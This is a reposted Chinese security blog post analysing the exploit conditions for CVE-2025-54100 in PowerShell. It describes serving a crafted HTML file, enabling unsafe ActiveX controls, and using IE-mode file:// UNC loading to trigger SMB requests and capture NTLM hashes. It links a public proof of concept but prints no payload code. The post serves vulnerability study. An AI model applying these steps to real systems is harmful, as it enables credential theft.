文章总结： 本文分析了CVE-2025-54100漏洞的实际利用条件与限制。研究表明，触发该漏洞需启用未标记为安全的ActiveX控件，或必须在IE及Edge旧模式中打开HTML文件以触发SMB请求。作者指出现代浏览器及PowerShell默认拦截相关请求，且IE已废弃，导致该漏洞在实战中利用条件苛刻，价值有限。 综合评分： 72 文章分类： 漏洞分析,漏洞POC,WEB安全

CVE-2025-54100学习有感

原创

MicroPest MicroPest

MicroPest

2026年2月4日 08:48 安徽

近期，看到通报中提到了这个高危漏洞，而且有人中招了，就着手研究了下，限于水平以下观点理解不一定对。

部署难度很低，只要在服务器上部署一个web服务式html文档，利用curl(或 Invoke-WebRequest -Uri) http://<服务器Ip>/filename.html，利用方法列举部分文章，主要是难在触发条件上，如下阐述。

1、第一种利用方式：

（1）、https://github.com/ThemeHackers/CVE-2025-54100

（2）、【复现】Windows PowerShell命令注入漏洞（CVE-2025-54100）

经过我有限水平的测试，发现这个CVE触发是有条件的，即：在 Win + R中输入``inetcpl.cpl打开

启用 “初始化并脚本化未标记为安全的 ActiveX 控件”。

如果这个没有启用，是触发不了的。这就有点鸡肋了。

2、第二种利用方式：

如：powershell-CVE-2025-54100漏洞POC补充复现

触发 NTLM 的关键一步在浏览器里，目前脚本只在「双击打开 1.html」或「用 IE/Edge 旧模式打开」时才生效；PowerShell 的 Invoke-WebRequest 默认不会自动加载   ，因此不会发出 SMB 请求，也就抓不到哈希。

但触发条件苛刻：

只有 IE 或 Edge-IE 模式 才允许网页通过  file://  UNC 自动加载图片；

Chrome/Firefox/Edge(Chromium) 默认拦截  file://  跨主机请求；

PowerShell 的  Invoke-WebRequest  只下载 HTML 本身，不会解析 DOM，也不会请求    标签里的 UNC 路径，因此 SMB 包不会发出。

结论：必须把 1.html 送进 IE 或 Office 里打开，才能让  file://  UNC 产生 SMB 认证。

问题是：IE现在还有用吗？Office 必须允许 ActiveX 自动激活（信任中心设置），除了没意识的，谁会打开默认的呢（再次组合式，复杂了，超出这个CVE的范畴了）。

对这个CVE，有什么高见，可交流。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：MicroPest MicroPest MicroPest《CVE-2025-54100学习有感》